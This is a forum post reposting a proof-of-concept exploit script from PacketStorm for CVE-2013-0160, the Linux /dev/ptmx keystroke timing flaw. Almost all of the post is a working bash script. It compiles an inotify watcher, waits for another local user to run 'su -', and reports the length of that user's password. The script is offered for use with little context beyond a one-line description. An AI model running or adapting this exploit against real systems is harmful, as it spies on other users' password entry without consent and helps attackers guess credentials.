Jump to content
Praetorian503

Inter-Keystroke Timing Proof Of Concept

Recommended Posts

This proof of concept exploit determines the password length of a local user who runs "su -".

#!/bin/bash
# ptmx-su-pwdlen.sh -- This PoC determine the password length of a local
# user who runs "su -". Done thanks to the ptmx keystroke timing attack
# (CVE-2013-0160). See http://vladz.devzero.fr/013_ptmx-timing.php for
# more information.
#
# Tested on Debian 6.0.5 (kernel 2.6.32-5-amd64).
#
# "THE BEER-WARE LICENSE" (Revision 42):
# <vladz@devzero.fr> wrote this file. As long as you retain this notice
# you can do whatever you want with this stuff. If we meet some day, and
# you think this stuff is worth it, you can buy me a beer in return. -V.

if ps -e -o cmd= | egrep -q "^(-|^)su"; then
echo "[-] Kill/close all running \"su\" session before using this PoC"
exit 1
fi

exe=$(mktemp) || exit 1
tmp=$(mktemp) || exit 1

cat > ${exe}.c << _EOF_
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <sys/inotify.h>

static int count = 0;

void display_result() {

printf("[+] password len is %d\n", count-1);
_exit(0);
}

int main() {

int fd;
char buf[1024];

signal(SIGINT, display_result);

fd = inotify_init();
inotify_add_watch(fd, "/dev/ptmx", IN_MODIFY);

while(read(fd, buf, 1024)) count++;

return 0;
}
_EOF_

cc -o ${exe}{,.c}

echo "[*] Wait for someone to run \"su -\""

while true; do

ps -e -o cmd= | egrep "^(-|^)su" >${tmp}
x=$(wc -l ${tmp})

case ${x% *} in

1) (( run )) && continue;
echo -n "[+] su detected, full command: "
cat ${tmp}; ${exe} &
(( run = 1 )) ;;

2) [ ! -z "$!" ] && kill -2 $!; break ;;

esac

done

rm -f ${exe}{,.c} ${tmp}

Source: PacketStorm

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...